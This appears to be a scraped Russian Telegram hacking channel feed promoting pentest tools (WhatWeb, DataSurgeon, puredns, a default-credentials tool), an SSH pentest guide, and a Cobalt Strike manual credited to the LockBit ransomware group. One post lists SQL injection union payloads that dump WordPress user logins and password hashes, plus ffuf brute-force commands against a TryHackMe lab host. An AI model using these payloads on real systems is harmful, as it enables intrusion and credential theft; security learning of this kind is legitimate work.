http-status-codes.png
780.4 KB
🕸 Коды ответа HTTP
Код ответа (состояния) HTTP показывает, был ли успешно выполнен определённый HTTP запрос. Коды сгруппированы в 5 классов:
1. Информационные 100 - 199
2. Успешные 200 - 299
3. Перенаправления 300 - 399
4. Клиентские ошибки 400 - 499
5. Серверные ошибки 500 - 599
#cheatsheet #network
Код ответа (состояния) HTTP показывает, был ли успешно выполнен определённый HTTP запрос. Коды сгруппированы в 5 классов:
1. Информационные 100 - 199
2. Успешные 200 - 299
3. Перенаправления 300 - 399
4. Клиентские ошибки 400 - 499
5. Серверные ошибки 500 - 599
#cheatsheet #network
This media is not supported in your browser
VIEW IN TELEGRAM
DataSurgeon v1.1.0 — утилита для извлечения полезной информации из текстовых файлов и страниц сайтов.
🌵 emails
🌵 phone numbers
🌵 API keys
🌵 URLs
🌵 MAC addresses
🌵 Hashes
🌵 Bitcoin wallets и д.р
⚙️ GitHub/Инструкция
#pentest #redteam #github #soft
🌵 emails
🌵 phone numbers
🌵 API keys
🌵 URLs
🌵 MAC addresses
🌵 Hashes
🌵 Bitcoin wallets и д.р
⚙️ GitHub/Инструкция
#pentest #redteam #github #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from GitHub программиста
WhatWeb Next generation web scanner — Жирнющий сканер, комбайн
Из интересного: Больше 1800 плагинов и столько же разработчиков 🔥
⚙️ GitHub/Инструкция
#ruby #redteam #pentest
Из интересного: Больше 1800 плагинов и столько же разработчиков 🔥
⚙️ GitHub/Инструкция
#ruby #redteam #pentest
☠️ Как стать хакером?
⚡️ Большая пошаговая практика по хакингу и пентесту для новичков
🔥 Ломаем сайт на Wordpress, раскучиваем SQL инъекцию
🌵 Энумерация
🌵 SQL инъекции
🌵 Взлом хэшей паролей
🌵 Поиск субдоменов и директорий
🌵 Reverse shell
🌵 Повышение привилегий
Если интересна тема пентеста и хакинга на практике, поддержите видео лайком и комментарием на YouTube. Спасибо за поддержку! 💪
https://youtu.be/chC6DWwOiKc
#youtube #pentest #redteam
⚡️ Большая пошаговая практика по хакингу и пентесту для новичков
🔥 Ломаем сайт на Wordpress, раскучиваем SQL инъекцию
🌵 Энумерация
🌵 SQL инъекции
🌵 Взлом хэшей паролей
🌵 Поиск субдоменов и директорий
🌵 Reverse shell
🌵 Повышение привилегий
Если интересна тема пентеста и хакинга на практике, поддержите видео лайком и комментарием на YouTube. Спасибо за поддержку! 💪
https://youtu.be/chC6DWwOiKc
#youtube #pentest #redteam
NetStalkers
☠️ Как стать хакером? ⚡️ Большая пошаговая практика по хакингу и пентесту для новичков 🔥 Ломаем сайт на Wordpress, раскучиваем SQL инъекцию 🌵 Энумерация 🌵 SQL инъекции 🌵 Взлом хэшей паролей 🌵 Поиск субдоменов и директорий 🌵 Reverse shell 🌵 Повышение привилегий…
SQL injection:
'union select null, null-- -
'union select null, null, database()-- -
'union select null,null, table_schema from information_schema.tables-- -
'union select null,null,table_name from information_schema.tables where table_schema='wordpress'-- -
'union select null,null,group_concat(column_name) from information_schema.columns where table_name='wp_users'-- -
'union select null,null,group_concat(user_login,user_pass) from wordpress.wp_users-- -
Перебор субдоменов:
ffuf -u "http://wekor.thm" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.wekor.thm" -fs 23
Перебор директорий:
ffuf -u "http://site.wekor.thm/FUZZ" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Please open Telegram to view this post
VIEW IN TELEGRAM
SSH penetration testing.pdf
2.7 MB
Тестирование на проникновение через SSH от HackingAtricles, 2023 г.
Протокол SSH, также известный как Secure Shell, представляет собой метод безопасного и надежного удаленного входа с одного компьютера на другой. Он предлагает несколько вариантов надежной аутентификации, поскольку он защищает соединения и коммуникации, безопасность и целостность с помощью надежного шифрования. Это безопасная альтернатива незащищенным протоколам входа в систему (таким как telnet, rlogin) и небезопасным методам передачи файлов (таким как FTP).
#ssh #doc #redteam
Протокол SSH, также известный как Secure Shell, представляет собой метод безопасного и надежного удаленного входа с одного компьютера на другой. Он предлагает несколько вариантов надежной аутентификации, поскольку он защищает соединения и коммуникации, безопасность и целостность с помощью надежного шифрования. Это безопасная альтернатива незащищенным протоколам входа в систему (таким как telnet, rlogin) и небезопасным методам передачи файлов (таким как FTP).
#ssh #doc #redteam
💰 Как зарабатывать удаленно с нуля
💻 7 способов заработка в интернете
https://youtu.be/VjYgW_u1wvU
#youtube
https://youtu.be/VjYgW_u1wvU
#youtube
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Cobalt Strike — инструмент для тестирования на проникновение, который дает специалистам по безопасности доступ к большому разнообразию атак.
В первую очередь он позволяет доставить на атакуемый компьютер полезную нагрузку и управлять ею, но помимо этого Cobalt Strike может использоваться для целевого фишинга, получения несанкционированного доступа к системам, а также может имитировать различные вредоносные программы и другие сложные тактики атак.
Перевод на русский от LockBit
#doc #pentest #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡️ Практика Python ⚡️
💰 Лучший сервис по переводу текста в речь в 2023
💣 Разные голоса, Интонация, Знаки препинания, Точность 100% 😱
https://youtu.be/OZheTATBt2k
#youtube
💰 Лучший сервис по переводу текста в речь в 2023
💣 Разные голоса, Интонация, Знаки препинания, Точность 100% 😱
https://youtu.be/OZheTATBt2k
#youtube
Forwarded from Ralf Hacker Channel (Ralf Hacker)
This media is not supported in your browser
VIEW IN TELEGRAM
Иногда нужно найти сайты/просканировать поддомены для определенного домена. Очень сильно помогает puredns.
1. Cначала запускаем dnsvalidator. Он соберёт список отвечающих NS серверов (остановить минут через 5 работы, 3-4к серверов хватит).
P.S. при сканировании с wi-fi, во время скана от сети отрубились все устройства, кроме сканирующего ноута😅
#pentest #scan #dns #soft #hacktricks
1. Cначала запускаем dnsvalidator. Он соберёт список отвечающих NS серверов (остановить минут через 5 работы, 3-4к серверов хватит).
dnsvalidator -tL https://public-dns.info/nameservers.txt -threads 100 -o resolvers.txt2. Затем запускаем puredns. Указываем словарь с поддоменами, домен для сканирования и файл, полученный на предыдущем шаге.
puredns bruteforce dns.lst domain.com -r resolvers.txtНа сканирование словарика 9.5 млн записей уйдет примерно 4 минуты))
P.S. при сканировании с wi-fi, во время скана от сети отрубились все устройства, кроме сканирующего ноута😅
#pentest #scan #dns #soft #hacktricks
Default Credentials Cheat Sheet — Простоая в использовании утилита пентестера написанная на Python в которой хранятся тысячи дефолтных паролей от популярных сервисов.
Установка:
#python #github #redteam
Установка:
$ git clone https://github.com/ihebski/DefaultCreds-cheat-sheet⚙️ GitHub/Инструкция
$ pip3 install -r requirements.txt
$ cp creds /usr/bin/ && chmod +x /usr/bin/creds
$ creds search tomcat
#python #github #redteam